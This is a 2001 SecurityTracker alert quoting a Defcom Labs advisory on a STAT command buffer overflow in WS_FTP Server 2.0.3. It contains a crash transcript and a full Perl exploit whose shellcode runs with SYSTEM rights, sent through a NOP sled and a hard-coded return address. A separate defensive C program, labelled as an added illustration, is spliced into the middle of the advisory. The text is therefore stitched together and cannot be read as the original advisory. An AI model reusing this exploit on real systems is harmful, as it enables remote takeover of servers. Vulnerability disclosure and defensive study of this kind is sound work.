Category:   Application (File Transfer/Sharing)  >   WS_FTP Vendors:   Ipswitch
WS_FTP Server Buffer Overflow in STAT Command Lets Remote Users Execute Arbitrary Code with System Level Privileges
SecurityTracker Alert ID:  1002699
SecurityTracker URL:  http://securitytracker.com/id/1002699
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 5 2001
Impact:   Execution of arbitrary code via network, Root access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0.3, possibly earlier versions
Description:   Defcom Labs warned of a buffer overflow in WS_FTP server. Remote users can run code on the server with System privileges.

It is reported that the parsing code for the STAT command contains a buffer overflow. A remote user can send a STAT command followed by an argument greater than 479 (475 bytes + new return address) bytes to trigger the vulnerability and overwrite the EIP.

A demonstration exploit transcript and a demonstration exploit script are provided in the Source Message.

Impact:   A remote user can execute arbitrary code on the server with System level privileges.
Solution:   The vendor has released a fixed version (2.0.4), available at the Vendor URL.
Vendor URL:  www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  def-2001-31


--------------20067D626DDC99B39503357C
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

======================================================================
                  Defcom Labs Advisory def-2001-31

                WS_FTP server 2.0.3 Buffer Overflow

Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-10-05
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.3 contains a buffer overflow which affects the
STAT command. This buffer overflow gives an attacker the ability to
run code on the target with SYSTEM RIGHTS, due to the fact that the
server runs as a service by default.

------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.3 and possibly earlier versions

----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
  The parsing code for the STAT command suffers from a buffer
  overflow. By sending a STAT command followed by an argument greater
  than 479 (475 bytes + new return address) bytes, a buffer will
  overflow and the EIP will be overwritten. The overflow is dependent
  on the length of the server name, because the argument, the
  server name and some more information are formatted together with
  wsprintf into the same buffer. A proof-of-concept exploit is attached
  to the advisory.

  C:\tools\web>nc localhost 21
  220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
  220-Wed Aug 08 19:57:40 2001
  220-30 days remaining on evaluation.
  220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  stat  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAA

  0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
  SetFolder = C:\program\iFtpSvc\helig
  SetFolder = C:\program\iFtpSvc\helig\public
  SetFolder = C:/program/iFtpSvc/helig
  0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
  (A1)
  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
  esi=0067c280 edi=00130178
  eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
  41414141 ??               ???
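The coupling described above (client argument and server name formatted together into one fixed buffer, so the overflow point moves with the server name length) is the property a defender wants to understand and to close. The following C program is an added illustration, not WS_FTP code and not from the Defcom advisory: the 480-byte buffer, the `211-%s status of %s` reply layout, the 255-byte argument limit and all function names are assumptions made for the example. It models how many bytes an unbounded `sprintf`/`wsprintf` would need without actually writing them, shows a bounded replacement that rejects over-long arguments and treats truncation as an error, and includes a small control-channel check that a proxy or log scanner could use to flag oversized STAT arguments.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumptions for this illustration (not WS_FTP's real values): a fixed
 * 480-byte reply buffer and a policy limit of 255 bytes for the STAT
 * argument (the RFC 959 pathname role that argument normally plays). */
#define REPLY_BUF_SIZE 480
#define STAT_ARG_MAX   255
#define MAX_DEMO_ARG   1024

/* Assumed reply layout: the server name and the client argument are
 * formatted into the same buffer, the coupling the advisory describes. */
#define REPLY_FMT "211-%s status of %s\r\n"

/* Bytes the formatted reply needs (NUL excluded), measured without writing:
 * snprintf with a NULL buffer and size 0 only counts. */
size_t stat_reply_needed_len(const char *servername, const char *arg)
{
    int n = snprintf(NULL, 0, REPLY_FMT, servername, arg);
    return n < 0 ? 0 : (size_t)n;
}

/* Would an unbounded sprintf/wsprintf of this reply run past a
 * REPLY_BUF_SIZE byte buffer (terminating NUL included)? */
bool stat_reply_overflows(const char *servername, const char *arg)
{
    return stat_reply_needed_len(servername, arg) + 1 > REPLY_BUF_SIZE;
}

/* Smallest argument length that overflows for a given server name: this is
 * why the byte count in the advisory shifts with the server name length. */
size_t stat_overflow_threshold(const char *servername)
{
    size_t fixed = stat_reply_needed_len(servername, "");
    return fixed >= REPLY_BUF_SIZE ? 0 : REPLY_BUF_SIZE - fixed;
}

/* Hardened builder: bound the argument before formatting, format with an
 * explicit size, and treat truncation as a failure rather than as a reply.
 * Returns 0 on success, -1 if the argument is rejected or does not fit. */
int build_stat_reply_safe(char *out, size_t outsz,
                          const char *servername, const char *arg)
{
    if (outsz == 0) return -1;
    out[0] = '\0';
    if (strlen(arg) > STAT_ARG_MAX) return -1;
    int n = snprintf(out, outsz, REPLY_FMT, servername, arg);
    if (n < 0 || (size_t)n >= outsz) { out[0] = '\0'; return -1; }
    return 0;
}

/* Demo helpers: build a constructed argument of 'arglen' 'A' bytes and
 * report the unbounded model's verdict and the hardened builder's verdict. */
bool unbounded_overflows_for_len(const char *servername, size_t arglen)
{
    char arg[MAX_DEMO_ARG + 1];
    if (arglen > MAX_DEMO_ARG) arglen = MAX_DEMO_ARG;
    memset(arg, 'A', arglen);
    arg[arglen] = '\0';
    return stat_reply_overflows(servername, arg);
}

int safe_build_for_len(const char *servername, size_t arglen)
{
    char arg[MAX_DEMO_ARG + 1], reply[REPLY_BUF_SIZE];
    if (arglen > MAX_DEMO_ARG) arglen = MAX_DEMO_ARG;
    memset(arg, 'A', arglen);
    arg[arglen] = '\0';
    return build_stat_reply_safe(reply, sizeof reply, servername, arg);
}

/* Control-channel check for a proxy, IDS rule or log scanner: the argument
 * length of a "STAT <arg>" line (verb case-insensitive, CR/LF stripped),
 * or -1 when the line is not a STAT command at all. */
long stat_arg_len(const char *line)
{
    static const char verb[] = "STAT";
    for (int i = 0; i < 4; i++)
        if (line[i] == '\0' || toupper((unsigned char)line[i]) != verb[i])
            return -1;
    const char *p = line + 4;
    if (*p != '\0' && *p != ' ' && *p != '\r' && *p != '\n')
        return -1;                          /* a longer verb such as STATUS */
    while (*p == ' ') p++;
    size_t len = strlen(p);
    while (len > 0 && (p[len - 1] == '\r' || p[len - 1] == '\n')) len--;
    return (long)len;
}

/* Flag a STAT line whose argument exceeds the policy limit. */
bool stat_line_suspicious(const char *line)
{
    return stat_arg_len(line) > STAT_ARG_MAX;
}

int main(void)
{
    printf("overflow threshold for 'helig': %zu bytes\n",
           stat_overflow_threshold("helig"));
    printf("overflow threshold for 'helig.example': %zu bytes\n",
           stat_overflow_threshold("helig.example"));
    printf("hardened builder, 600-byte argument: %d\n",
           safe_build_for_len("helig", 600));
    printf("'stat pub' suspicious: %d\n", stat_line_suspicious("stat pub\r\n"));
    return 0;
}
```

The two thresholds printed by `main` differ by exactly the difference in server name length, which is the reason a fixed byte count in a signature is fragile; the length check in `stat_line_suspicious` and the bound in `build_stat_reply_safe` do not depend on the server name at all.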

---------------------------=[Workaround]=-----------------------------
Download the new version (2.0.4) from:
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp2.pl

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendor's attention on the 8th of
August, 2001. A patch has been released.

======================================================================
            This release was brought to you by Defcom Labs

          labs@defcom.com             http://labs.defcom.com
======================================================================
--------------20067D626DDC99B39503357C
Content-Type: application/x-perl;
 name="ws_ftp2.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="ws_ftp2.pl"

#########################################################################
#
# WS_FTP Server 2.0.3 STAT proof-of-concept exploit
# By andreas@defcom.com (C)2001
#
# 
# There are a couple of things screwing up this exploit. First, the
# total number of bytes we control in the area where ESP is pointing,
# corresponds to the number of bytes in the domain name. So, to make sure
# it works on as many systems as possible, Im only using 2 bytes here.
# So, we have to jump back through the buffer... Fun.. :)
# Second, the number of bytes needed to overwrite EIP is dependant on the
# number of bytes in the server name.
# Third, the stack has to be moved to the heap, because there is no
# good place on the stack, it just ends with CreateFile overwriting stuff.
#
# Im using a "jump esp" in shlwapi.dll(0x70beed87) as the return address,
# change this if it does not work on your system.
#
#########################################################################
$login="ftp";	#username
$pass="ftp";	#password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
	print "WS_FTP server 2.0.3 STAT proof-of-concept exploit\n";
	print "It creates a file named defcom.iyd in the c-root\n";
	print "(C)2001 andreas\@defcom.com\n";
   	print "Usage: $0 <host>\n";
	print "Example: $0 127.0.0.1\n";
	exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
###########################################################################################
# get servername and length of domain
recv(SOCK,$reply,1024,0);
@split1 = split(/\ /,$reply);
@split2 = split(/\-/,$split1[0]);
$servername = $split2[1];
$pos = index($servername,"\.");
if ($pos == -1) { print "Error: Domain has to be atleast two characters"; exit; }
$domain = substr($servername,$pos);
if (length($domain) < 2) { print "Error: Domain has to be atleast two characters"; exit; }
###########################################################################################

sleep(1);
$msg = "user $login\n"; 
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit="\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xc2\x83\xc0\x1a\xeb\x02\xeb\x80\x33";
$sploit = $sploit . "\xc9\x66\xb9\xd6\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\x12";
$sploit = $sploit . "\x7b\x1a\x75\x92\x12\x75\xcb\xf1\x99\x63\x99\x99\xf1\xd9\x99\x99\x99";
$sploit = $sploit . "\x27\x45\x8d\xdc\x99\x66\x8f\xc3\x9c\x99\x63\x99\x99\x12\x79\x12\x75";
$sploit = $sploit . "\xaa\x59\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a";
$sploit = $sploit . "\x5b\xfb\xcb\x27\xbd\x8c\xdc\x99\x66\x8f\xaa\x59\xc9\x27\x89\x8f\xdc";
$sploit = $sploit . "\x99\x66\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "stat " . "\x90" x (480-length($sploit)-length($servername)) . $sploit . "\x87\xed\xbe\x70" . "\x90" x 16 . "\xeb\x81" . "\r\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
exit;
--------------20067D626DDC99B39503357C--
